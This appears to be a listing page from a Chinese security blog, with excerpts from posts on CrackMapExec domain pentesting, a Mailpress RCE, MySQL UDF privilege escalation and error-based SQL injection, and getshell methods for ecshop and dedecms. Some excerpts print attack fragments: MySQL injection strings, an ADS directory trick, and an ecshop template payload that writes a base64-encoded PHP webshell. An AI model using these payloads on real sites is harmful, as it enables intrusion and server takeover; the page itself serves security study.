热门 域渗透之使用CrackMapExec拿到我们想要的东西(二)

时间:2016-12-19   作者:webbaozi   分类: web安全   热度:799°    
时间:2016-12-19   分类: web安全    热度:799  
前言 在第一部分我们讲过的基础知识: 使用凭证 dump凭据 执行命令 使用payload模块 在第二部分我们将介绍CME的内部数据库以及如何使用 metasploit和 Empire来拿到shell. 数据库 CME的内部数据库可以通过使用cme_db.py脚本进行查询,两件事情会自动记录到数据库中: CME所访问到的所有主机 拥有管理员权限的每台主机上的所有可获取的凭据 此外CME还会记录哪...

阅读全文>>

热门 域渗透之使用CrackMapExec拿到我们想要的东西(一)

时间:2016-12-19   作者:webbaozi   分类: web安全   热度:783°    
时间:2016-12-19   分类: web安全    热度:783  
前言 这是一系列的介绍CrackMapExec的很多功能的文章。下面是对CrackMapExec这个工具的一个概况性的介绍。 它是一个后渗透工具,像Veil-Pillage, smbexec一样 它是一种在域渗透过程中使各种渗透测试框架联合起来的 "胶水 " 可以完全并行的在同一时间连接,攻击多台主机. 它有一个内部数据库可以用来存储获得的凭据,同时来追踪具有管理员权限的用户. 它的功能是基于多种现有的工具 它是"安全": 该工具做的所有事情不是通过在内存中运行,就是...

阅读全文>>

热门 WordPress Mailpress Remote Code Execution

时间:2016-12-14   作者:webbaozi   分类: 代码审计   热度:738°    
时间:2016-12-14   分类: 代码审计    热度:738  
0x00 introduction Mailpress是一个比较流行的邮件插件。 Plugin Directory:https://wordpress.org/plugins/mailpress/ 官网:http://blog.mailpress.org 0x01 漏洞简述 Mailpress存在越权调用,在不登陆的情况下,可以调用系统某些方法,可以造成远程命令执行。 0x02 漏洞详细 文件: mailpress\mp-includes\action.php <?php // include(‘../.....

阅读全文>>

热门 udf提权笔记(及脚本下载)

时间:2016-12-7   作者:webbaozi   分类: 小技巧   热度:1857°    
时间:2016-12-7   分类: 小技巧    热度:1857  
mysql版本大于5.1 1.使用select @@basedir(select @@datadir)查询mysql安装目录 当sehll没有mysql目录操作权限时,利用ADS创建\lib\plugin目录 查询 select 'xxx' into dumpfile 'C:\\MySQL\\lib::$INDEX_ALLOCATION'; 此时会报错 ERROR 3 (HY000): Error writing file 'C:\MySQL\lib::$INDEX_ALLOCATION' (Errcode: 22) 但是lib这个目录已经创建好了。...

阅读全文>>

热门 MySQL暴错注入方法整理(共12种)

时间:2016-12-6   作者:webbaozi   分类: 小技巧   热度:1407°    
时间:2016-12-6   分类: 小技巧    热度:1407  
1、通过floor报错,注入语句如下:    and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2、通过ExtractValue报错,注入语句如下: and extractvalue(1, concat(0x5c, (select t...

阅读全文>>

热门 ecshop后台getshell方法集合

时间:2016-11-29   作者:webbaozi   分类: 小技巧   热度:1323°    
时间:2016-11-29   分类: 小技巧    热度:1323  
姿势来源互联网,只是做个整理~~ 1. 模板管理--语言项编辑 如:user.php 搜索:状态 插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgQGFzc2VydCgkX1BPU1RbJ3onXSk7Pz4))}} 访问http://localhost/languages/zh_cn/user.php 一句话:http://localhost/languages/zh_cn/fuck.php密码z ...

阅读全文>>

热门 灰盒测试之织梦dedecms 5.7 官网最新版 Getshell

时间:2016-11-28   作者:webbaozi   分类: web安全   热度:1440°    
时间:2016-11-28   分类: web安全    热度:1440  
很久之前一直用dedecms做二次开发、直接做模版就好了,偶尔要写原生的php代码与dede交互,简单的了解了下里面的model,并未深入,dedecms漏洞那么多、、、能不能也找出一个漏洞呢。 下载了官网最新的程序研究了下。 在前台有个提交友情链接的地方,链接是:/plus/flink_add.php,估计以前可能这里存在xss的吧。反正现在是修复了,不过发现传入的链接,在后台可以直接打开,这样就可以结合csrf进一步利用了。 然后这里网址的,默认有http://,也猜到了是提醒这是个http链接,后端没有判断,登陆后台看了下,果然是直接插入进去的: 这样证明了可以做诱...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1